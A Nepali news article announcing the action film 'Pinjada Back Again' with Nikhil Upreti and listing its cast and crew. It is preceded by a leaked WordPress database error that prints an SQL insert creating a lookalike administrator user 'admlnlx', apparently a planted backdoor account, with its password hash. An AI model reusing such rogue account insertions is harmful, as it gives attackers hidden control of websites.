WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPWLifwVNs1cw1O5q6ka62s1PQyGV4.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 07:12:14', '', 'admlnlx', 'admlnlx')
काठमाडौं–
एक्सन स्टार निखिल उप्रेती ‘पिँजडा ब्याक अगेन’ लिएर आउने भएका छन् ।
काठमाडौंमा एक कार्यक्रमगरि ‘पिँजडा ब्याक अगेन’ चलचित्रको घोषणा भएपछि उनी चलचित्रमा देखिने भएका छन् । एक्सन नायक निखिलको डेब्यू चलचित्र ‘पिँजडा’ हो । त्यसैले यस चलचित्रलाई बहुप्रतिक्षित चलचित्रको रुपमा हेरिने भएको छ । चलचित्र पिँजडामा नायक निखिलले सात तलाबाट हाम फालेको दृश्य निकै चर्चित बनेको थियो । ‘पिँजडा ब्याक अगेन’ पूर्ण एक्शन प्रधान हुने बताइएको छ ।
‘पिँजडा ब्याक अगेन’मा निखिल उप्रेती र सारा सिर्पाली मूख्य भुमिका देखिने छन् । यस्तै यस चलचित्रमा नायिका तथा निमात्री सुस्मिता केसी, सुन्दर श्रेष्ठ, पुकार भट्टराइ, सुशान्त श्रेष्ठ, आरके मानन्धर, भास्कर ओली, अनुराग शाह, विवेक सिंह, गोकुल, चन्द्र अधिकारी, तारा रञ्जित थापा, कुसाग्र भट्टराइ, आशा गौतम, किरण उप्रेती, राजबाबु श्रेष्ठ र ज्याक श्रेष्ठ लगायतको अभिनय रहनेछ ।
रामजी लामिछानेको कोरियोग्राफी रहने फिल्ममा महेश खड्का, वसन्त सापकोटा, अर्जुन पोखरेल र राजनराज शिवाकोटीको संगीत रहनेछ । सौरभ लामाले खिच्ने फिल्मका प्रस्तुतकर्ता श्रीराम बराल हुन भने रोहित पुरी, गोविन्द गैरे, चन्द्र हधिकारी निर्मातामा छन् । कार्यकारी निर्माता भने सुशान्त श्रेष्ठ हुन् । चलचित्र अर्को वर्ष दर्शैमा प्रदर्शन गरिने निर्माण युनिटले जनाएको छ ।
